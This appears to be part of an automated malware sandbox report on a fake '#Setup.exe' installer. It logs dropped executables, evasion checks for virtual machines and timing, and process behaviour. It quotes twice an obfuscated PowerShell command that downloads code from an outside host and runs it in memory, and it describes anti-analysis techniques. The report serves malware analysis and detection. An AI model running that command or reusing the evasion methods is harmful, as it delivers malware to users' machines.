Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000002.2360275508.0000000000935000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000026.00000002.2956766226.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000026.00000002.2980993319.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BrightLib.exe, 00000026.00000002.2956766226.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000026.00000002.2980993319.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbXs< source: powershell.exe, 00000005.00000002.2377053357.0000000007008000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.7.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	Static PE information: real checksum: 0x9307ce should be: 0x8615ed
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29

Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	Static PE information: section name: .didata
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.7.dr	Static PE information: section name: .didata
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	Static PE information: section name: .didata

Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0298D1F4 push eax; mov dword ptr [esp], ACADAEAFh	0_2_0298D202
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0298FBB4 push eax; mov dword ptr [esp], 29282F7Eh	0_2_0298FBB7
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02974D99 push es; retf	0_2_02974D9A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02974D75 push es; retf	0_2_02974D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00E928FF push ds; retf 0007h	5_2_00E92902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00E9218D push FFFFFFE9h; iretd	5_2_00E921A1

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	File created: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\#Setup.exe	File created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-FS5QT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	File created: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\#Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\#Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\#Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

API/Special instruction interceptor: Address: 6C027C44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	RDTSC instruction interceptor: First address: 6C02F3E1 second address: 6C02F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	RDTSC instruction interceptor: First address: 6C02F3FD second address: 6C02F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F2F49076B55h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F2F49076BE0h 0x00000031 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4537			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 958			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\#Setup.exe TID: 7144	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908	Thread sleep count: 4537 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908	Thread sleep count: 958 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6776	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1088	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: #Setup.exe, 00000000.00000003.2237789985.0000000003803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
